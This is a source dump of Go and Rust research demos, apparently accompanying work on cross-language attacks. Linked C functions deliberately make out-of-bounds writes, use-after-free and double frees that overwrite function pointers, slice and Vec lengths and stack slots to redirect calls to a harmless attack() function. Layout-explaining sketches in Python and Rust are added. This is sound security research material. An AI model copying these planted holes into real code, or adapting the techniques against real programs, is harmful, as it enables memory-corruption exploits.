12 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
13 | 	ar crs $(DIR)src/init/libinit.a $(DIR)/src/init/init.o 
14 | 
15 | go: dynamic-c 
16 | 	gofmt -e -s -w .
17 | 	CGO_CFLAGS="-flto -ffat-lto-objects" go build $(DIR)/src/main.go
18 | 
19 | sim: 
20 | 	LD_LIBRARY_PATH=$(DIR)/src/init/ $(DIR)/main 
21 | 
22 | obj: go 
23 | 	objdump -S $(DIR)/main > $(DIR)/main.obj
24 | 	
25 | clean:
26 | 	rm -rf $(DIR)/main
27 | 	rm -f $(DIR)/src/init/libinit.a
28 | 	rm -f $(DIR)/src/init/libinit.so
29 | 	rm -f $(DIR)/src/init/init.o
30 | 	rm -f $(DIR)/main.obj
31 | 


--------------------------------------------------------------------------------
/go-cla-examples/src/init/init.c:
--------------------------------------------------------------------------------
  1 | #include <stdint.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <malloc.h>
  5 | 
  6 | // Simple function that acts as user input
  7 | extern int64_t get_attack();
  8 | 
  9 | // Simple initialization function
 10 | void init() {
 11 |     // Turns off heap checks for double frees 
 12 |     // Set to lowest level which just prints out the error and continues
 13 |     // Not strictly necessary, but helps with presentation
 14 |     // I.e., prints when we achieved a double free
 15 |     mallopt(M_CHECK_ACTION, 1);
 16 | }
 17 | 
 18 | // Given the array to modify, this function sets a field in the array
 19 | // Can cause an OOB vulnerability
 20 | void user_given_array(int64_t array_ptr_addr) {
 21 |     // These values could be set by a corruptible source, e.g., user input
 22 |     // Thus, the index points to Data.cb and value is the address of attack() 
 23 |     // This is an OOB, as it indexes past the allocated array of size 3
 24 |     int64_t array_index = 3;
 25 |     int64_t array_value = get_attack(); 
 26 | 
 27 |     int64_t* a = (void *)array_ptr_addr;
 28 |     printf("addr of a[array_index] in user_given_array: %ld\n", (int64_t)&(a[array_index]));
 29 | 
 30 |     a[array_index] = array_value;
 31 |     printf("Done with user_given_array.\n");
 32 | }
 33 | 
 34 | // This function prints the address of a given array 
 35 | // Can cause UaF and DF vulnerabilities
 36 | void print_array_addr(int64_t array_ptr_addr) {
 37 |     int64_t* a = (void *)array_ptr_addr;
 38 |     printf("addr of a in print_array_addr: %ld\n", (int64_t)a);
 39 | 
 40 |     // This is an unnecessary free call, as Go allocated the array 
 41 |     // (and subsequently Go will free this array later) 
 42 |     //free(a);
 43 | 
 44 |     // C now thinks it can use a for something else 
 45 |     // (e.g., set it to a user defined address)
 46 |     // Go may not realize this functionality occurs
 47 |     // These values could be set by a corruptible source, e.g., user input
 48 |     int64_t array_value = get_attack(); 
 49 |     *a = array_value;
 50 | 
 51 |     printf("Done with print_array_addr.\n");
 52 | }
 53 | 
 54 | 
 55 | // This function allocates its own array and populates based on user input
 56 | void user_set_array() {
 57 | 
 58 |     // Initialize array
 59 |     int64_t a[1] = { 0 };
 60 | 
 61 |     // These values could be set by a corruptible source, e.g., user input
 62 |     // Thus, the index points past this array and the value is the address of attack()
 63 |     // This is an OOB, as it indexes past the allocated array of size 1
 64 |     // Note: the value of array_index only works 50% of the time
 65 |     // It depends on what memory address the stack gets 
 66 |     // (i.e., stack location is not deterministic in Go) 
 67 |     // Thus, we corrupt two likely candidates
 68 | 
 69 |     int64_t array_index = (((int64_t)get_attack() + 824628677912) - (int64_t)&a)/8; 
 70 |     int64_t array_index2 = (((int64_t)get_attack() + 824628698392) - (int64_t)&a)/8; 
 71 | 
 72 |     int64_t array_value = get_attack(); 
 73 | 
 74 |     printf("addr of &a: %ld\n", (int64_t)&a);
 75 |     printf("array_value: %ld\n", array_value);
 76 |     printf("addr of a[array_index] in user_set_array: %ld\n", (int64_t)&(a[array_index]));
 77 |     printf("addr of a[array_index2] in user_set_array: %ld\n", (int64_t)&(a[array_index2]));
 78 | 
 79 |     a[array_index] = array_value;
 80 |     a[array_index2] = array_value;
 81 |     printf("Done with user_set_array.\n");
 82 | }
 83 | 
 84 | // Go calls this function to get the right address of a call back function
 85 | // If Go doesn't properly sanitize data from this function, 
 86 | // it could return corrupted data
 87 | int64_t get_cb_from_c() {
 88 |     // These values could be set by a corruptible source, e.g., user input
 89 |     int64_t call_back_addr = get_attack(); 
 90 | 
 91 |     return call_back_addr;
 92 | }
 93 | 
 94 | // Given the array to modify, this function sets a field in the array
 95 | // Can cause an OOB vulnerability
 96 | void user_given_slice(int64_t slice_ptr_addr) {
 97 |     // These values could be set by a corruptible source, e.g., user input
 98 |     // Thus, the index points into the slice fat pointer and the value is too large
 99 |     // This leads to an OOB, as the corrupted length lets Go index past the allocated slice
100 |     int64_t array_index = 1;
101 |     int64_t array_value = 10000000; 
102 | 
103 |     int64_t* a = (void *)slice_ptr_addr;
104 |     printf("addr of a[array_index] in user_given_slice: %ld\n", (int64_t)&(a[array_index]));
105 | 
106 |     a[array_index] = array_value;
107 |     printf("Done with user_given_slice.\n");
108 | }
109 | 


--------------------------------------------------------------------------------
/go-cla-examples/src/init/init.h:
--------------------------------------------------------------------------------
1 | #include <stdint.h>
2 | 
3 | void init();
4 | void user_given_array(int64_t array_ptr_addr);
5 | void print_array_addr(int64_t array_ptr_addr);
6 | void user_set_array();
7 | void user_given_slice(int64_t slice_ptr_addr);
8 | int64_t get_cb_from_c();
9 | 


--------------------------------------------------------------------------------
/go-cla-examples/src/main.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | /*
  4 | #include "./init/init.h"
  5 | #include <stdint.h>       // for C.int64_t
  6 | #include <stdlib.h>       // for free()
  7 | #cgo LDFLAGS: -L./init/ -linit
  8 | */
  9 | import "C"
 10 | 
 11 | import (
 12 | 	"fmt"
 13 | 	"unsafe"
 14 | )
 15 | 
 16 | var fa_attack = attack
 17 | 
 18 | const MAX_LENGTH = 3
 19 | 
 20 | //export get_attack
 21 | func get_attack() C.int64_t {
 22 | 
 23 | 	// Get a pointer to the address of the function pointer
 24 | 	p := unsafe.Pointer(&fa_attack)
 25 | 
 26 | 	// Convert that pointer to an integer address that can be passed to C
 27 | 	p_addr := C.int64_t(uintptr(p))
 28 | 
 29 | 	return p_addr
 30 | }
 31 | 
 32 | type Data struct {
 33 | 	vals  [MAX_LENGTH]int64
 34 | 	cb    *func(*int64)
 35 | 	slice []int64
 36 | 	cb2   *func(*int64)
 37 | }
 38 | 
 39 | // A simple benign function that adds two to a value
 40 | //go:noinline
 41 | func doubler(x *int64) {
 42 | 	fmt.Println("Not attacked! Adding two to the input...")
 43 | 	*x = *x + 2
 44 | }
 45 | 
 46 | // A simple benign function that increments a value
 47 | //go:noinline
 48 | func incrementer(x *int64) {
 49 | 	fmt.Println("Not attacked! Adding one to the input...")
 50 | 	*x = *x + 1
 51 | }
 52 | 
 53 | // Attack aims to call this
 54 | // Could be replaced with actual gadgets that together execute a weird machine
 55 | //go:noinline
 56 | func attack() {
 57 | 	fmt.Println("We were attacked!")
 58 | }
 59 | 
 60 | // Main function
 61 | //go:noinline
 62 | func analyze_data(cb_fptr *func(*int64)) {
 63 | 
 64 | 	// Initialize program
 65 | 	C.init()
 66 | 
 67 | 	// Set up some function pointers
 68 | 	fa1 := incrementer
 69 | 	fp1 := (*func(*int64))(&fa1)
 70 | 	fa2 := doubler
 71 | 	fp2 := (*func(*int64))(&fa2)
 72 | 
 73 | 	// Initialize some data
 74 | 	data := Data{
 75 | 		vals:  [3]int64{1, 2, 3},
 76 | 		cb:    fp1,
 77 | 		slice: []int64{4, 5},
 78 | 		cb2:   fp2,
 79 | 	}
 80 | 	fmt.Println("Start data: vals[0]=", data.vals[0], "cb=", data.cb, "slice[0]=", data.slice[0], "cb2=", data.cb2)
 81 | 
 82 | 	// Get and print the addresses of the Data struct
 83 | 	data_vals_addr := C.int64_t(uintptr(unsafe.Pointer(&data.vals)))
 84 | 	data_cb_addr := C.int64_t(uintptr(unsafe.Pointer(&data.cb)))
 85 | 	data_slice_addr := C.int64_t(uintptr(unsafe.Pointer(&data.slice)))
 86 | 	data_cb2_addr := C.int64_t(uintptr(unsafe.Pointer(&data.cb2)))
 87 | 
 88 | 	fmt.Println("data_vals_addr", data_vals_addr)
 89 | 	fmt.Println("data_cb_addr", data_cb_addr)
 90 | 	fmt.Println("data_slice_addr", data_slice_addr)
 91 | 	fmt.Println("data_cb2_addr", data_cb2_addr)
 92 | 
 93 | 	// Get and print the address of the function argument to this function
 94 | 	cb_fptr_addr := C.int64_t(uintptr(unsafe.Pointer(&cb_fptr)))
 95 | 	fmt.Println("cb_fptr_addr", cb_fptr_addr)
 96 | 
 97 | 	// Get and print the address of a function pointer variable created with new
 98 | 	doubler_fp := new(func(*int64))
 99 | 	doubler_fp = fp2
100 | 	doubler_fp_addr := C.int64_t(uintptr(unsafe.Pointer(&doubler_fp)))
101 | 	fmt.Println("doubler_fp_addr", doubler_fp_addr)
102 | 
103 | 	// Get and print the address of a second function pointer variable created with new
104 | 	doubler2_fp := new(func(*int64))
105 | 	doubler2_fp = fp2
106 | 	doubler2_fp_addr := C.int64_t(uintptr(unsafe.Pointer(&doubler2_fp)))
107 | 	fmt.Println("doubler2_fp_addr", doubler2_fp_addr)
108 | 
109 | 	// Get a callback function pointer from C
110 | 	incrementer_fp_addr := C.get_cb_from_c()
111 | 	// Derive a function pointer from the address of a pointer to a function pointer
112 | 	incrementer_fp := (*func(*int64))(unsafe.Pointer(uintptr(incrementer_fp_addr)))
113 | 
114 | 	// Section 4 Attacks
115 | 	/* Go Static Bounds Check Bypass Attack */
116 | 	fmt.Println("Launching Go Bounds Check Bypass Attack...")
117 | 	C.user_given_array(data_vals_addr)
118 | 
119 | 	fmt.Println("Calling data.cb...")
120 | 	(*data.cb)(&data.vals[0])
121 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
122 | 
123 | 	/* Go Garbage Collection Bypass Attack */
124 | 	fmt.Println("Launching Go Garbage Collection Bypass Attack...")
125 | 	C.print_array_addr(doubler_fp_addr)
126 | 
127 | 	fmt.Println("Calling doubler_fp...")
128 | 	(*doubler_fp)(&data.vals[0])
129 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
130 | 
131 | 	/* C/C++ Hardening Bypass Attack */
132 | 	fmt.Println("Launching C/C++ Hardening Bypass Attack...")
133 | 	C.user_set_array()
134 | 
135 | 	fmt.Println("Calling cb_fptr...")
136 | 	(*cb_fptr)(&data.vals[0])
137 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
138 | 
139 | 	// Section 5 Attacks
140 | 	/* Corrupting Go Dynamic Bounds */
141 | 	fmt.Println("Launching Go Dynamic Bounds Check Bypass Attack...")
142 | 	C.user_given_slice(data_slice_addr)
143 | 
144 | 	// Now we can access past the length of data.slice in *Safe Go*
145 | 	// Length of slice is only 2 (and capacity is 2)
146 | 	// E.g., data.slice[22] actually points to doubler2_fp on the heap
147 | 	// So setting data.slice[22] actually corrupts the value a pointer holds
148 | 	// Moreover, slice_index and slice_val could come from a corruptible source, e.g., user input
149 | 	data_slice0_addr := C.int64_t(uintptr(unsafe.Pointer(&data.slice[0])))
150 | 	slice_index := (doubler2_fp_addr - data_slice0_addr) / 8
151 | 
152 | 	if slice_index > 0 {
153 | 		data_slice_I_addr := C.int64_t(uintptr(unsafe.Pointer(&data.slice[slice_index])))
154 | 
155 | 		fmt.Println("addr of data.slice[0]:", data_slice0_addr)
156 | 		fmt.Println("addr of data.slice[slice_index]:", data_slice_I_addr)
157 | 
158 | 		slice_val := int64(get_attack())
159 | 
160 | 		/* This OOB is done in Safe Go! */
161 | 		data.slice[slice_index] = slice_val
162 | 
163 | 	} else {
164 | 		// ASLR placed doubler2_fp "below" data.slice in the heap
165 | 		// But, we can't access a slice with a negative index
166 | 		fmt.Println("ASLR protected us! Better luck next time attacker...")
167 | 	}
168 | 
169 | 	fmt.Println("Calling doubler2_fp...")
170 | 	(*doubler2_fp)(&data.vals[0])
171 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
172 | 
173 | 	/* Corrupting Intended Interactions */
174 | 	fmt.Println("Launching Intended Interactions Attack...")
175 | 
176 | 	fmt.Println("Calling incrementer_fp...")
177 | 	(*incrementer_fp)(&data.vals[0])
178 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
179 | 
180 | 	/* Corrupting with Double Frees */
181 | 	// Unsure exactly when, but Go will try to free doubler_fp
182 | 	// but it was already freed in print_array_addr
183 | 	// This will cause an abort, but could be used to execute a weird machine
184 | }
185 | 
186 | func main() {
187 | 	// Set up a function pointer
188 | 	fa0 := incrementer
189 | 	fp0 := (*func(*int64))(&fa0)
190 | 
191 | 	// Call the main function
192 | 	analyze_data(fp0)
193 | 
194 | 	fmt.Println("Finished main.")
195 | }
196 | 
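Two of the attacks above depend on how `Data` is laid out in memory: `user_given_array` writes to index 3 of a three-element array, and `user_given_slice` writes to index 1 starting at the slice header. The sketch below models that layout with Python's `ctypes` to show which field each write lands on. It assumes a 64-bit target where the fields stay in declaration order with 8-byte alignment and the slice header is (pointer, length, capacity). The class names, the helper names, and the placeholder value `0xDEADBEEF` are illustrative only, and all writes stay inside the buffer that `ctypes` allocates for the struct.

```python
import ctypes


class SliceHeader(ctypes.Structure):
    # Assumed layout of a Go slice on a 64-bit target: pointer, length, capacity.
    _fields_ = [
        ("data", ctypes.c_uint64),
        ("len", ctypes.c_int64),
        ("cap", ctypes.c_int64),
    ]


class Data(ctypes.Structure):
    # Mirrors the Go struct: vals [3]int64, cb, slice, cb2 (pointers as 64-bit ints).
    _fields_ = [
        ("vals", ctypes.c_int64 * 3),
        ("cb", ctypes.c_uint64),
        ("slice", SliceHeader),
        ("cb2", ctypes.c_uint64),
    ]


def write_int64(base_addr, index, value):
    """Emulate the C code's `a[index] = value` on an int64_t* at base_addr."""
    ptr = ctypes.cast(ctypes.c_void_p(base_addr), ctypes.POINTER(ctypes.c_int64))
    ptr[index] = value


def slice_index_for(target_addr, slice_base_addr, elem_size=8):
    """Index that makes slice[index] alias target_addr, or None if unreachable.

    Like the `slice_index > 0` check in the Go code, a target at or below the
    slice base is rejected. The alignment check is an addition of this sketch.
    """
    offset = target_addr - slice_base_addr
    if offset <= 0 or offset % elem_size != 0:
        return None
    return offset // elem_size


if __name__ == "__main__":
    d = Data()
    base = ctypes.addressof(d)
    write_int64(base + Data.vals.offset, 3, 0xDEADBEEF)  # vals[3] aliases cb
    write_int64(base + Data.slice.offset, 1, 10000000)   # index 1 is the length
    print(hex(d.cb), d.slice.len)
```

Under these layout assumptions, the first write overwrites `cb` even though `vals` only has three elements, and the second inflates the slice length without touching the backing array, which is what later lets bounds-checked Go code index far past the two real elements.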


--------------------------------------------------------------------------------
/rust-cla-examples/Cargo.lock:
--------------------------------------------------------------------------------
 1 | # This file is automatically @generated by Cargo.
 2 | # It is not intended for manual editing.
 3 | [[package]]
 4 | name = "cc"
 5 | version = "1.0.72"
 6 | source = "registry+https://github.com/rust-lang/crates.io-index"
 7 | checksum = "22a9137b95ea06864e018375b72adfb7db6e6f68cfc8df5a04d00288050485ee"
 8 | 
 9 | [[package]]
10 | name = "rust-cla-ex"
11 | version = "0.1.0"
12 | dependencies = [
13 |  "cc",
14 | ]
15 | 


--------------------------------------------------------------------------------
/rust-cla-examples/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "rust-cla-ex"
 3 | version = "0.1.0"
 4 | authors = ["Samuel Mergendahl"]
 5 | edition = "2018"
 6 | 
 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 8 | 
 9 | [dependencies]
10 | 
11 | [build-dependencies]
12 | cc = "1.0"
13 | 
14 | [[bin]]
15 | name = "cla"
16 | path = "src/main.rs"
17 | 


--------------------------------------------------------------------------------
/rust-cla-examples/Makefile:
--------------------------------------------------------------------------------
 1 | DIR=$(dir $(realpath $(firstword $(MAKEFILE_LIST))))
 2 | 
 3 | all: rust
 4 | 
 5 | dynamic-c:
 6 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
 7 | 	clang -fPIC -shared -o $(DIR)src/init/libinit.so $(DIR)src/init/init.o -fsanitize=cfi -flto -fvisibility=hidden
 8 | 
 9 | static-c:
10 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
11 | 	ar crs $(DIR)src/init/libinit.a $(DIR)/src/init/init.o 
12 | 
13 | rust: static-c 
14 | 	RUSTFLAGS="-Clinker-plugin-lto -Clinker=clang -Clink-arg=-fuse-ld=lld" cargo build --release
15 | 
16 | sim: 
17 | 	$(DIR)/target/release/cla 
18 | 
19 | obj: rust 
20 | 	objdump -S $(DIR)/target/release/cla > $(DIR)/main.obj
21 | 	
22 | clean:
23 | 	rm -rf target
24 | 	rm -f $(DIR)/src/init/libinit.a
25 | 	rm -f $(DIR)/src/init/libinit.so
26 | 	rm -f $(DIR)/src/init/init.o
27 | 	rm -f $(DIR)/main.obj
28 | 


--------------------------------------------------------------------------------
/rust-cla-examples/build.rs:
--------------------------------------------------------------------------------
1 | fn main() {
2 |     println!("cargo:rustc-link-search=./src/init/");
3 |     //println!("cargo:rustc-link-lib=dylib=init");
4 |     println!("cargo:rustc-link-lib=static=init");
5 | }
6 | 


--------------------------------------------------------------------------------
/rust-cla-examples/src/init/init.c:
--------------------------------------------------------------------------------
  1 | #include <stdint.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <malloc.h>
  5 | 
  6 | // Simple function that acts as user input
  7 | extern int64_t get_attack();
  8 | 
  9 | // Simple initialization function
 10 | void init() {
 11 |     // Turns off heap checks for double frees 
 12 |     // Set to lowest level which just prints out the error and continues
 13 |     // Not strictly necessary, but helps with presentation
 14 |     // I.e., prints when we achieved a double free
 15 |     mallopt(M_CHECK_ACTION, 1);
 16 | }
 17 | 
 18 | // Given the array to modify, this function sets a field in the array
 19 | // Can cause an OOB vulnerability
 20 | void user_given_array(int64_t array_ptr_addr) {
 21 |     // These values could be set by a corruptible source, e.g., user input
 22 |     // Thus, the index points to Data.cb and value is the address of attack() 
 23 |     // This is an OOB, as it indexes past the allocated array of size 3
 24 |     int64_t array_index = 3;
 25 |     int64_t array_value = get_attack(); 
 26 | 
 27 |     int64_t* a = (void *)array_ptr_addr;
 28 |     printf("addr of a[array_index] in user_given_array: %ld\n", (int64_t)&(a[array_index]));
 29 | 
 30 |     a[array_index] = array_value;
 31 |     printf("Done with user_given_array.\n");
 32 | }
 33 | 
 34 | // This function prints the address of a given array 
 35 | // Can cause UaF and DF vulnerabilities
 36 | void print_array_addr(int64_t array_ptr_addr) {
 37 |     int64_t* a = (void *)array_ptr_addr;
 38 |     printf("addr of a in print_array_addr: %ld\n", (int64_t)a);
 39 | 
 40 |     // This is an unnecessary free call, as Rust allocated the array 
 41 |     // (and subsequently Rust will free this array later) 
 42 |     free(a);
 43 | 
 44 |     // C now thinks it can use a for something else 
 45 |     // (e.g., set it to a user defined address)
 46 |     // Rust may not realize this functionality occurs
 47 |     // These values could be set by a corruptible source, e.g., user input 
 48 |     int64_t array_value = get_attack(); 
 49 |     *a = array_value;
 50 | 
 51 |     printf("Done with print_array_addr.\n");
 52 | }
 53 | 
 54 | 
 55 | // This function allocates its own array and populates based on user input
 56 | void user_set_array() {
 57 | 
 58 |     // Initialize array
 59 |     int64_t a[1] = { 0 };
 60 | 
 61 |     // These values could be set by a corruptible source, e.g., user input
 62 |     // Thus, the index reaches into the caller's stack (apparently targeting cb_fptr)
 63 |     // and the value is the address of attack(); an OOB write past the local array of size 1
 64 |     int64_t array_index = 28; 
 65 |     int64_t array_value = get_attack(); 
 66 | 
 67 |     printf("addr of &a: %ld\n", (int64_t)&a);
 68 |     printf("array_value %ld\n", array_value);
 69 |     printf("addr of a[array_index] in user_set_array: %ld\n", (int64_t)&(a[array_index]));
 70 | 
 71 |     a[array_index] = array_value;
 72 |     printf("Done with user_set_array.\n");
 73 | }
 74 | 
 75 | // Rust calls this function to get the address of a callback function
 76 | // If Rust doesn't properly sanitize the value this function returns,
 77 | // Rust could end up calling a corrupted address
 78 | int64_t get_cb_from_c() {
 79 |     // These values could be set by a corruptible source, e.g., user input
 80 |     int64_t call_back_addr = get_attack(); 
 81 | 
 82 |     return call_back_addr;
 83 | }
 84 | 
 85 | // Given the Vec to modify, this function sets a field of the Vec itself
 86 | // Can cause an OOB vulnerability
 87 | void user_given_vec(int64_t vec_ptr_addr) {
 88 |     // These values could be set by a corruptible source, e.g., user input
 89 |     // Thus, the index points into the Vec fat pointer (presumably its length) and the value is too large
 90 |     // This enables later OOB accesses, as the real allocation only holds 2 elements
 91 |     int64_t array_index = 2;
 92 |     int64_t array_value = 10000000; 
 93 | 
 94 |     int64_t* a = (void *)vec_ptr_addr;
 95 | 
 96 |     printf("addr of a[array_index] in user_given_vec: %ld\n", (int64_t)&(a[array_index]));
 97 | 
 98 |     a[array_index] = array_value;
 99 |     printf("Done with user_given_vec.\n");
100 | }
101 | 
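
The comments in user_given_array rely on index 3, counted from vals[0], landing on Data.cb. Below is a minimal Rust sketch of that address arithmetic. `DataLayout`, `benign`, and `cb_index_from_vals` are hypothetical names that do not appear in this repository, and the struct is marked `#[repr(C)]` so that its field order is fixed. The real `Data` in main.rs uses the default Rust representation, whose layout is not guaranteed, so the actual offset should be confirmed from the addresses the example prints at run time.

```rust
use std::mem::size_of;

/// Hypothetical stand-in for `Data`; `#[repr(C)]` is an assumption made here
/// so that `cb` is guaranteed to follow `vals` in memory.
#[repr(C)]
pub struct DataLayout {
    pub vals: [i64; 3],
    pub cb: fn(&mut i64),
}

/// Hypothetical benign callback used only to fill the `cb` field.
pub fn benign(x: &mut i64) {
    *x += 1;
}

/// Returns the element index, counted from `vals[0]`, at which `cb` is stored.
pub fn cb_index_from_vals() -> usize {
    let d = DataLayout { vals: [1, 2, 3], cb: benign };
    // Address of the first array element.
    let base = d.vals.as_ptr() as usize;
    // Address of the field that holds the function pointer.
    let cb_addr = &d.cb as *const fn(&mut i64) as usize;
    // Distance in bytes, converted to a count of i64-sized elements.
    (cb_addr - base) / size_of::<i64>()
}
```

Under this assumed layout the result is one past the last valid index of `vals`, which is why a C-side write through `a[3]` can overwrite the callback without any Rust bounds check being involved.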


--------------------------------------------------------------------------------
/rust-cla-examples/src/init/init.h:
--------------------------------------------------------------------------------
1 | #include <stdint.h>
2 | 
3 | void init();
4 | void user_given_array(int64_t array_ptr_addr);
5 | void print_array_addr(int64_t array_ptr_addr);
6 | void user_set_array();
7 | void user_given_vec(int64_t vec_ptr_addr);
8 | int64_t get_cb_from_c();
9 | 


--------------------------------------------------------------------------------
/rust-cla-examples/src/main.rs:
--------------------------------------------------------------------------------
  1 | /* External unsafe functions */
  2 | 
  3 | extern "C" { fn init(); }
  4 | extern "C" { fn user_set_array(); }
  5 | extern "C" { fn user_given_array(array_ptr_addr: i64); }
  6 | extern "C" { fn user_given_vec(vec_ptr_addr: i64); }
  7 | extern "C" { fn print_array_addr(array_ptr_addr: i64); }
  8 | extern "C" { fn get_cb_from_c() -> i64; }
  9 | 
 10 | // A simple function that acts as user input
 11 | #[no_mangle]
 12 | extern "C" fn get_attack() -> i64 {
 13 |     return attack as i64;
 14 | }
 15 | 
 16 | pub const MAX_LENGTH: usize = 3;
 17 | 
 18 | // A simple struct that we frequently manipulate
 19 | pub struct Data {
 20 |     vals: [i64;MAX_LENGTH],
 21 |     cb: fn(&mut i64),
 22 |     vecs: std::vec::Vec<i64>,
 23 |     cb2: fn(&mut i64)
 24 | }
 25 | 
 26 | // A simple benign function that, despite its name, adds two to a value
 27 | #[no_mangle]
 28 | #[inline(never)]
 29 | pub fn doubler(x: &mut i64) {
 30 |     println!("Not attacked! Adding two to input...");
 31 |     *x += 2;
 32 | }
 33 | 
 34 | // A simple benign function that increments a value
 35 | #[no_mangle]
 36 | #[inline(never)]
 37 | pub fn incrementer(x: &mut i64) {
 38 |     println!("Not attacked! Adding one to input...");
 39 |     *x += 1;
 40 | }
 41 | 
 42 | // Attack aims to call this
 43 | // Could be replaced with actual gadgets that together execute a weird machine
 44 | #[no_mangle]
 45 | #[inline(never)]
 46 | pub fn attack() {
 47 |     println!("We were attacked!");
 48 | }
 49 | 
 50 | // Main function
 51 | #[no_mangle]
 52 | #[inline(never)]
 53 | fn analyze_data(cb_fptr: fn(&mut i64)) {
 54 | 
 55 |     // Initialize program
 56 |     unsafe{init()};
 57 |     
 58 |     // Set up some function pointers
 59 |     let fp1 = incrementer;
 60 |     let fp2 = doubler;
 61 | 
 62 |     // Initialize some data 
 63 |     let mut data = Data {
 64 |         vals: [1,2,3],
 65 |         cb: fp1,
 66 |         vecs: vec![4,5],
 67 |         cb2: fp2
 68 |     };
 69 |     println!("Start data: vals[0]={}, cb={}, vecs[0]={}, cb2={}", 
 70 |              data.vals[0], 
 71 |              data.cb as *const fn(&mut i64) as i64, 
 72 |              data.vecs[0], 
 73 |              data.cb2 as *const fn(&mut i64) as i64);
 74 | 
 75 |     // Get and print the addresses of the fields of the Data struct
 76 |     let data_vals_addr = &data.vals as *const i64 as i64;
 77 |     let data_cb_addr = &data.cb as *const fn(&mut i64) as i64;
 78 |     let data_vecs_addr = &data.vecs as *const std::vec::Vec<i64> as i64;
 79 |     let data_cb2_addr = &data.cb2 as *const fn(&mut i64) as i64;
 80 | 
 81 |     println!("data_vals_addr: {}", data_vals_addr);
 82 |     println!("data_cb_addr: {}", data_cb_addr);
 83 |     println!("data_vecs_addr: {}", data_vecs_addr);
 84 |     println!("data_cb2_addr: {}", data_cb2_addr);
 85 | 
 86 |     // Get and print the address of the function argument to this function 
 87 |     let cb_fptr_addr = &cb_fptr as *const fn(&mut i64) as i64;
 88 |     println!("cb_fptr_addr: {}", cb_fptr_addr);
 89 | 
 90 |     // Get and print the address of heap data that a Box stores
 91 |     let doubler_fp: Box<fn(&mut i64)> = Box::new(doubler);
 92 |     let doubler_fp_addr = &(*doubler_fp) as *const fn(&mut i64) as i64;
 93 |     println!("doubler_fp_addr: {}", doubler_fp_addr);
 94 | 
 95 |     // Get and print the address of heap data that a Box stores
 96 |     let doubler2_fp: Box<fn(&mut i64)> = Box::new(doubler);
 97 |     let doubler2_fp_addr = &(*doubler2_fp) as *const fn(&mut i64) as i64;
 98 |     println!("doubler2_fp_addr: {}", doubler2_fp_addr);
 99 | 
100 |     // Get a callback function pointer from C
101 |     // Uses unsafe because the raw address returned by C must be
102 |     // reinterpreted as a function pointer; this models an intended interaction
103 |     let incrementer_fp = unsafe { 
104 |         let c_addr: i64 = get_cb_from_c();
105 |         let ptr = c_addr as *const fn(&mut i64);
106 |         let fp: fn(&mut i64) = std::mem::transmute::<*const fn(&mut i64), fn(&mut i64)>(ptr);
107 |         fp
108 |     }; 
109 | 
110 |     // Section 4 Attacks
111 |     /* Rust Bounds Check Bypass Attack */
112 |     println!("Launching Rust Bounds Check Bypass Attack...");
113 |     unsafe{ user_given_array(data_vals_addr) }
114 | 
115 |     println!("Calling data.cb...");
116 |     (data.cb)(&mut data.vals[0]);
117 |     println!("Updated data: vals[0]={}", data.vals[0]);
118 | 
119 |     /* Rust Lifetime Bypass Attack */
120 |     println!("Launching Rust Lifetimes Bypass Attack...");
121 |     unsafe{ print_array_addr(doubler_fp_addr) }
122 | 
123 |     println!("Calling doubler_fp...");
124 |     doubler_fp(&mut data.vals[0]);
125 |     println!("Updated data: vals[0]={}", data.vals[0]);
126 | 
127 |     /* C/C++ Hardening Bypass Attack */
128 |     println!("Launching C/C++ Hardening Bypass Attack...");
129 |     unsafe{ user_set_array() }
130 | 
131 |     println!("Calling cb_fptr...");
132 |     cb_fptr(&mut data.vals[0]);
133 |     println!("Updated data: vals[0]={}", data.vals[0]);
134 | 
135 |     // Section 5 Attacks
136 |     /* Corrupting Rust Dynamic Bounds */
137 |     println!("Launching Dynamic Rust Bounds Check Bypass Attack...");
138 |     unsafe{ user_given_vec(data_vecs_addr) }
139 | 
140 |     // Now we can access past the length of data.vecs in *Safe Rust*
141 |     // The real length of data.vecs is only 2 (and its capacity is 2)
142 |     // E.g., data.vecs[22] may actually point to doubler2_fp on the heap
143 |     // So setting data.vecs[vec_index] actually corrupts the function pointer stored there
144 |     // Moreover, vec_index and vec_val could come from a corruptible source, e.g., user input
145 | 
146 |     let data_vecs0_addr = &data.vecs[0] as *const i64 as i64;
147 |     let vec_index = ((doubler2_fp_addr - data_vecs0_addr)/8) as usize; 
148 |     let vec_val = get_attack();
149 |     
150 |     println!("addr of data.vecs[0]: {}", &data.vecs[0] as *const i64 as i64);
151 |     println!("addr of data.vecs[vec_index]: {}", &data.vecs[vec_index] as *const i64 as i64);
152 | 
153 |     /* This OOB is done in Safe Rust! */
154 |     data.vecs[vec_index] = vec_val;
155 | 
156 |     println!("Calling doubler2_fp...");
157 |     doubler2_fp(&mut data.vals[0]);
158 |     println!("Updated data: vals[0]={}", data.vals[0]);
159 | 
160 |     /* Corrupting Intended Interactions */
161 |     println!("Launching Intended Interactions Attack...");
162 |     println!("Calling incrementer_fp...");
163 |     incrementer_fp(&mut data.vals[0]);
164 |     println!("Updated data: vals[0]={}", data.vals[0]);
165 | 
166 |     /* Corrupting with Serialization Errors */
167 |     // TODO
168 | 
169 |     /* Corrupting vTable dynamic dispatch */
170 |     // TODO
171 | 
172 |     /* Corrupting with Double Frees */
173 |     // Rust will now free doubler_fp as it goes out of scope here, 
174 |     // but it was already freed in print_array_addr
175 |     // This will cause an abort, but could be used to execute a weird machine
176 | }
177 |  
178 | fn main() {
179 |     // Set up a function pointer
180 |     let fp0 = doubler;
181 | 
182 |     // Call the main function 
183 |     analyze_data(fp0);
184 | 
185 |     println!("Finished main.");
186 | }
187 | 
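
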